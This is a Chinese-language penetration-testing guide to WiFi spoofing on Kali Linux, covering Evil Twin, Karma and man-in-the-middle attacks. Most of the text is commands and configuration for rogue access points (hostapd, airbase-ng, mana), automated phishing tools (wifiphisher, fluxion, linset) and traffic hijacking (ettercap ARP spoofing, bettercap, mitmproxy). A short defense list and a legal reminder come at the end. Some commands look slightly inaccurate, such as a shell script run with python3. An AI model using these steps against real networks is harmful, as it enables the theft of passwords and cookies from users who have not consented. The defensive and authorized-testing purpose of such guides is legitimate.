Kali Linux Wifi 伪造热点

在 Kali Linux 中，**WiFi 欺骗攻击**（如 Evil Twin、Karma 攻击、中间人攻击等）是常见的渗透测试技术，用于评估无线网络的安全性。以下是常用的 **WiFi 欺骗攻击方法及工具**，涵盖 **伪造热点、流量劫持、钓鱼攻击** 等技术。

---

## **1. Evil Twin（恶意双胞胎）攻击**
**原理**：伪造一个与目标 WiFi 同名的热点，诱使用户连接，进而窃取数据或进行钓鱼攻击。  
**工具**：
### **(1) `hostapd` + `dnsmasq`（手动搭建）**
```bash
# 1. 设置无线网卡为监听模式
airmon-ng start wlan0  

# 2. 创建虚拟热点（需修改配置文件）
hostapd /path/to/hostapd.conf
```
**`hostapd.conf` 示例**：
```ini
interface=wlan0
driver=nl80211
ssid=Free_WiFi
channel=6
hw_mode=g
```
**`dnsmasq.conf` 示例**：
```ini
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
```
**作用**：
- `hostapd` 创建虚假 AP  
- `dnsmasq` 提供 DHCP 服务  

---

### **(2) `airbase-ng`（Aircrack-ng 套件）**
```bash
# 1. 创建虚假 AP（-e 设置 SSID）
airbase-ng -e "Free_WiFi" -c 6 wlan0mon
```
**适用场景**：
- 快速搭建 Evil Twin，但需手动配置 DHCP 和 NAT 转发。

---

### **(3) `wifiphisher`（自动化钓鱼）**
```bash
wifiphisher --essid "Free_WiFi" -j
```
**特点**：
- 自动创建 Evil Twin + 钓鱼页面（如登录页面、固件升级页面）。  
- 支持 **WPA3 钓鱼**（需额外配置）。  

---

## **2. Karma 攻击（自动响应 Probe 请求）**
**原理**：监听客户端发送的 Probe 请求（如手机自动搜索已保存的 WiFi），并伪造同名热点诱骗连接。  
**工具**：
### **(1) `mana-toolkit`**
```bash
# 1. 安装
apt install mana-toolkit  

# 2. 启动 Karma 攻击
python3 /usr/share/mana-toolkit/run-mana/start-nat-full.sh
```
**特点**：
- 自动响应所有 Probe 请求（如 `Starbucks_WiFi`）。  
- 可结合 `ettercap` 进行 MITM 攻击。  

---

### **(2) `hostapd-mana`（增强版 hostapd）**
```bash
hostapd-mana /path/to/hostapd-mana.conf
```
**适用场景**：
- 比 `mana-toolkit` 更轻量，适合长期监听。  

---

## **3. 中间人攻击（MITM）**
**目标**：劫持 WiFi 客户端流量，窃取敏感信息（如密码、Cookie）。  
**工具**：
### **(1) `ettercap`（ARP 欺骗）**
```bash
ettercap -T -i wlan0 -M arp:remote /192.168.1.1// /192.168.1.100//
```
**作用**：
- 欺骗客户端和路由器，劫持流量。  
- 可结合 `sslstrip` 降级 HTTPS 流量（部分场景失效）。  

---

### **(2) `bettercap`（现代 MITM 工具）**
```bash
bettercap -iface wlan0
```
**功能**：
- 支持 **WiFi 嗅探、ARP 欺骗、DNS 劫持、HTTPS 中间人**。  
- 可自动钓鱼（如伪造登录页面）。  

---

### **(3) `mitmproxy`（HTTPS 流量分析）**
```bash
mitmproxy --mode transparent --showhost
```
**适用场景**：
- 解密 HTTPS 流量（需客户端安装恶意证书）。  

---

## **4. 自动化 WiFi 欺骗框架**
### **(1) `fluxion`（图形化钓鱼）**
```bash
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion && ./fluxion.sh
```
**特点**：
- 提供图形化界面，支持 Evil Twin + 钓鱼页面（如伪造 WiFi 登录）。  

---

### **(2) `linset`（西班牙语界面）**
```bash
git clone https://github.com/vk496/linset.git
cd linset && ./linset
```
**适用场景**：
- 类似 `fluxion`，但更轻量。  

---

## **5. 防御方法（蓝队视角）**
1. **禁用 Probe 请求**（减少 Karma 攻击风险）。  
2. **使用 WPA3-Enterprise**（避免 Evil Twin）。  
3. **监控异常 AP**（如 `airodump-ng` 检测同名热点）。  
4. **强制 HTTPS**（防止 `sslstrip` 攻击）。  
5. **客户端证书认证**（防止 MITM）。  

---

## **法律与道德提醒**
- **仅限授权测试**，未经许可攻击他人 WiFi 属违法行为。  
- 红队演练需签署 **授权协议**，遵守《网络安全法》。  

---

### **总结**
| **攻击类型**       | **工具**                | **适用场景**                     |
|--------------------|-------------------------|----------------------------------|
| Evil Twin          | `hostapd`, `wifiphisher` | 伪造热点 + 钓鱼                  |
| Karma 攻击         | `mana-toolkit`          | 自动响应 Probe 请求              |
| MITM（流量劫持）   | `bettercap`, `ettercap`  | ARP 欺骗、HTTPS 解密             |
| 自动化钓鱼         | `fluxion`, `linset`      | 图形化 WiFi 钓鱼攻击             |

学习时建议在 **虚拟机或授权环境** 测试，避免法律风险。